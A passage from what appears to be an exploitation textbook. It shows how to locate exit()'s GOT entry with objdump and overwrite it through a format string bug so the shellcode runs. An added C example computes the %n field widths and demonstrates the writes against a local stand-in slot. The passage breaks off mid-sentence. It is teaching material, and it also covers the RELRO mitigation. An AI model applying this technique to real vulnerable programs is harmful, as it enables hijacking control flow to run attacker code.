reader@hacking:~/booksrc $ objdump -h ./fmt_vuln | grep -A1 "\ .plt\ "
10 .plt 00000060 080482b8 080482b8 000002b8 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
But closer examination of the jump instructions (the jmp *0x8049780 and jmp *0x8049784 lines below) reveals that they aren't jumping to addresses but through pointers to addresses. For example, the actual address of the printf() function is stored as a pointer at the memory address 0x08049780, and the exit() function's address is stored at 0x08049784.
080482f8 <printf@plt>:
80482f8: ff 25 80 97 04 08 jmp *0x8049780
80482fe: 68 18 00 00 00 push $0x18
8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>
08048308 <exit@plt>:
8048308: ff 25 84 97 04 08 jmp *0x8049784
804830e: 68 20 00 00 00 push $0x20
8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>
These pointers live in another section, called the global offset table (GOT), which is writable: the dynamic linker fills the slots in at run time. (The push and second jmp after each pointer jump are the lazy-binding path. Until a function is first called, its GOT slot points back at that push, which enters the resolver stub at the start of .plt, 0x080482b8; the resolver then stores the real address in the slot.) The slot addresses can be obtained directly by displaying the binary's dynamic relocation entries with objdump -R.
reader@hacking:~/booksrc $ objdump -R ./fmt_vuln
./fmt_vuln: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
08049774 R_386_JUMP_SLOT __gmon_start__
08049778 R_386_JUMP_SLOT __libc_start_main
0804977c R_386_JUMP_SLOT strcpy
08049780 R_386_JUMP_SLOT printf
08049784 R_386_JUMP_SLOT exit
reader@hacking:~/booksrc $
This shows that the pointer to the exit() function (the R_386_JUMP_SLOT entry for exit above) is located in the GOT at 0x08049784. If the address of the shellcode is written over that entry, the program will call the shellcode when it thinks it's calling exit(), provided exit() is actually reached after the vulnerable printf(). Note that this only works while the GOT is writable: a binary linked with full RELRO (-z relro -z now) has these slots remapped read-only once the dynamic linker has resolved them, so the write would segfault instead. Check with readelf -l for a GNU_RELRO segment and readelf -d for the BIND_NOW flag; with both present, the .got.plt holding these slots is read-only by the time printf() runs.
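The write primitive this relies on, as an added example that is not code from the book or from fmt_vuln: given the value the GOT slot should end up holding, it computes the %x field widths so that printf's running character count, captured by %n, ends in each target byte in turn (least significant byte first), and then performs those four overlapping 4-byte writes against an in-process stand-in for the slot. The shellcode address 0xbffff8c4, the 28 characters of output assumed to precede the first counted %x (addresses and filler), and the function names are assumptions for illustration, not values from the page.

```c
/*
 * Added example (not code from the book or from fmt_vuln): the byte-at-a-time
 * %n write used to overwrite a 4-byte GOT entry, and a safe in-process
 * demonstration of it.
 */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/*
 * Field widths for four "%<w>x%n" pairs that make printf's character count
 * end in each byte of 'value', least significant byte first.  'written' is
 * the number of characters the format string has already output before the
 * first controlled %x (addresses, filler, and any %x used to walk the stack).
 * Each width is at least 8 so a %x that prints a full 32-bit stack word never
 * exceeds its field and spoils the count.  Returns the final character count.
 */
int fmt_widths(uint32_t value, int written, int widths[4])
{
    int count = written;
    for (int i = 0; i < 4; i++) {
        int want = (value >> (8 * i)) & 0xff;
        int w = (want - (count & 0xff)) & 0xff;   /* characters needed, mod 256 */
        if (w < 8)
            w += 256;   /* the count only grows: wrap to the next 0x..want */
        widths[i] = w;
        count += w;
    }
    return count;
}

/* Render the tail of the payload, e.g. "%168x%n%52x%n%263x%n%192x%n". */
int build_fmt_tail(uint32_t value, int written, char *out, size_t outlen)
{
    int w[4];
    fmt_widths(value, written, w);
    return snprintf(out, outlen, "%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n",
                    w[0], w[1], w[2], w[3]);
}

/*
 * Execute the four writes against an in-process stand-in for the GOT slot.
 * The slot addresses are passed as explicit arguments, which is what the real
 * exploit arranges by placing them on the stack ahead of the format string.
 * Each %n stores a 4-byte int, so the writes at slot+1..slot+3 spill past the
 * slot; the 8-byte buffer absorbs that.  Widths travel as '*' arguments so the
 * format itself stays a read-only literal (glibc's fortified printf refuses %n
 * in a writable format).  Little-endian host assumed, as on x86.
 */
uint32_t demo_got_write(uint32_t value, int written)
{
    unsigned char slot[8] = {0};
    char out[4096];
    int w[4];

    if (fmt_widths(value, written, w) >= (int)sizeof out)
        return 0;   /* payload longer than the demo buffer */

    /* "%*s" with an empty string reproduces the 'written' leading characters. */
    snprintf(out, sizeof out, "%*s%*x%n%*x%n%*x%n%*x%n",
             written, "",
             w[0], 0u, (int *)(slot + 0),
             w[1], 0u, (int *)(slot + 1),
             w[2], 0u, (int *)(slot + 2),
             w[3], 0u, (int *)(slot + 3));

    uint32_t result;
    memcpy(&result, slot, sizeof result);
    return result;
}

int main(void)
{
    uint32_t shellcode = 0xbffff8c4u;  /* assumed shellcode address, for illustration */
    int written = 28;                  /* assumed characters output before the first counted %x */
    char tail[64];

    build_fmt_tail(shellcode, written, tail, sizeof tail);
    printf("payload tail: %s\n", tail);
    printf("slot after writes: 0x%08x\n", demo_got_write(shellcode, written));
    return 0;
}
```

Running it prints the tail of the payload (the part that follows the four target addresses and any stack-walking %x) and shows the stand-in slot holding 0xbffff8c4 afterwards. The third width comes out as 263 rather than 7 because the count can never decrease; the only way to land on a lower byte value is to wrap around past the next multiple of 256.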
As usual, the shellcode is placed in an environment variable, its actual location in memory is predicted, and the format string vulnerability is used to write that address. In fact, the shellcode should still be in the environment from before, so the only things that need adjusting are the first 16 bytes of the format string, which hold the target addresses; they must now point into the GOT entry for exit() at 0x08049784. The calculations for the %x format parameters will be done